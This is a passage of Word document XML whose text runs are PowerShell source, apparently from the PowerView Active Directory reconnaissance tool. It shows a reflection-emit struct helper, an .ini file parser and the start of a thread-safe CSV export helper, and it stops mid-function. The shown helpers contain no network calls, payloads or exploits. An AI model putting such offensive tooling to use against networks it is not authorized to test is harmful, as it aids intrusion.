        <w:t xml:space="preserve">        if ($ExplicitLayout) { $NewField.SetOffset($Offset) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7172798E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE28EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67652579" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Make the struct aware of its own size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B8C31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091E0999" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SizeMethod = $StructBuilder.DefineMethod('GetSize',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062E53B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'Public, Static',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01008B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7EB4DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type[]] @())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECFFAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator = $SizeMethod.GetILGenerator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418E8E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Thanks for the help, Jason Shirk!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB14EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204E6E03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF3F7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type].GetMethod('GetTypeFromHandle'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E933C15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174C8C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684710EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09610208" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6997ADA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Allow for explicit casting from an IntPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED6A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01170A78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF9618D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        'PrivateScope, Public, Static, HideBySig, SpecialName',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592054C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StructBuilder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860897E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type[]] @([IntPtr]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8779A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2 = $ImplicitConverter.GetILGenerator()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5284BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABAF950" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB43D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F653C8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D1040F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type].GetMethod('GetTypeFromHandle'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32957038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FED3BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300DA066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF3F60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF02F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CE0B2D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $StructBuilder.CreateType()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338B88A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C844F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="153CC669" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57945959" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713495CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963DDF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Misc. helpers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57466C26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AFC279" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C47F89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="355D93F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-IniContent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62026BD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EFA2F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AEC37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2254CCB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This helper parses an .ini file into a proper PowerShell object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DDD40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D9B25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: 'The Scripting Guys'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15AB70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Link: https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665ECF16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E3B724E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D0915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08722FF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5E4B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43910D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D207A63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203F98F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89DBBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('FullName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF8DA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({ Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA9BE51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F71F49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48782915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CCE43E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="035D01A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    ForEach($TargetPath in $Path) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215496C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IniObject = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE8156" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch -Regex -File $TargetPath {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A49690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "^\[(.+)\]" # Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30CF60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E909780" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Section = $matches[1].Trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10ECA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IniObject[$Section] = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4052C23E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $CommentCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F291A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C97D72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "^(;.*)$" # Comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE3B7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9CB8F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Value = $matches[1].Trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606FFF0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $CommentCount = $CommentCount + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43982EC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Name = 'Comment' + $CommentCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404648DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IniObject[$Section][$Name] = $Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365A983" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24EA05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "(.+?)\s*=(.*)" # Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79329D13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0EB3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Name, $Value = $matches[1..2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DA7C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Name = $Name.Trim()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA599B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Values = $Value.split(',') | ForEach-Object {$_.Trim()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C60C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Values -isnot [System.Array]) {$Values = @($Values)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298B6F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $IniObject[$Section][$Name] = $Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFD5F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFE2A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19963765" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $IniObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D7EFBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114FB88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D024A07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BDEBC2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Export-PowerViewCSV {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE59E5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8CFA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542A477" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38AC338F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This helper exports an -InputObject to a .csv in a thread-safe manner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D5FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        using a mutex. This is so the various multi-threaded functions in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17E0A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PowerView has a thread-safe way to export output to the same file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11C0FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73252902" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Based partially on Dmitry Sotnikov's Export-CSV code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A32B08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            at http://poshcode.org/1590</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6D51B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="621A48BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25659C5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="462C2826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://poshcode.org/1590</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270D1286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C548E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11949611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DD2C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C1CDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [System.Management.Automation.PSObject[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C652A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $InputObject,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691C10B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70A79317" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, Position=0)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2E039" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A20E91D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BC16C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41581571" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B5548" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E43A510" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ObjectCSV = $InputObject | ConvertTo-Csv -NoTypeInformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64204508" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4505252A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # mutex so threaded code doesn't stomp on the output file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F8D41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
